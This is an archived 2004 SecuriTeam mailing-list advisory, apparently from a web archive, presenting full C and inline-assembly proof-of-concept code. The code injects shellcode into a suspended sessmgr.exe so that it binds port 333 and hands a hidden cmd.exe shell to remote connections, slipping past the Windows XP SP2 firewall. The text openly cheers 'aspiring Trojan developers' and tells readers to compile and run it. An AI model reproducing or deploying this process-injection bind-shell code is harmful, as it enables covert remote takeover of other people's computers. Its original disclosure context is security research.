[EXPL] Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

From: SecuriTeam (support_at_securiteam.com)
Date: 10/13/04

Next message: SecuriTeam: "[NT] Adobe Acrobat/Reader 6 Local Files Access"

Previous message: SecuriTeam: "[NT] Vulnerability in NNTP Allows Remote Code Execution (MS04-036)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 13 Oct 2004 19:02:45 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Writing Trojans that Bypass Windows XP Service Pack 2 Firewall
------------------------------------------------------------------------

SUMMARY

Windows XP Service Pack 2 incorporates many enhancements to try to better
protect systems from malware and other forms of attacks. One of those
layers of protection is the Windows XP SP2 Firewall. One of the features
of this Firewall is the ability to allow users to decide what applications
can listen on the network. By allowing users to control what applications
can communicate on the network, Microsoft believes that systems will be
protected against threats such as Trojans. Like so many things Microsoft
says, this is inaccurate and in fact it is very easy for locally executing
code to bypass the Windows Firewall. So don't worry you aspiring Trojan
developers, your still going to be able to Trojan consumer and corporate
systems to your hearts content.

Attached to this advisory is proof of concept code that demonstrates how a
Trojan could bind to a port and accept connections by piggybacking on the
inherent trust of sessmgr.exe. Simply compile this program and run it as
any local user. To test if the Firewall has been bypassed (it is!) telnet
from another machine to the target machine on port 333 and if your
connected, then you've successfully bypassed the Windows XP Service Pack 2
Firewall.

DETAILS

Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD
_loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if
(!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:americanidiot@hushmail.com>
americanidiot.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] Adobe Acrobat/Reader 6 Local Files Access"

Previous message: SecuriTeam: "[NT] Vulnerability in NNTP Allows Remote Code Execution (MS04-036)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

ascii to st0
... push IDC_ARROW ... cmp eax, 0 ... mov ebp, esp ...
cmp dword @Message, WM_CLOSE ... (alt.lang.asm)
Re: Interesting Web Site on Open Source Development
... mov D§esp 0DEADBEEF call Code04013A0 ... call Code0401100 push eax lea
eax D§esp+014 push Data0402124 ... push eax call 'USER32.wsprintfA' add esp 0C push 030
lea ecx D§esp+014 push ecx ... (alt.lang.asm)
a problem in n5.dll in windows 95
... eax srandMl ... mov ebp, esp ... push dword @lpm ...
mov esi, @adw ... (alt.lang.asm)
Re: recvfrom
... push ebx ... mov eax, ... cmp eax, SOCKET_ERROR ...
(alt.lang.asm)
my first .dll: why doesnt it work ...
... eax atou ... push ebx ... mov esi, @string ... (alt.lang.asm)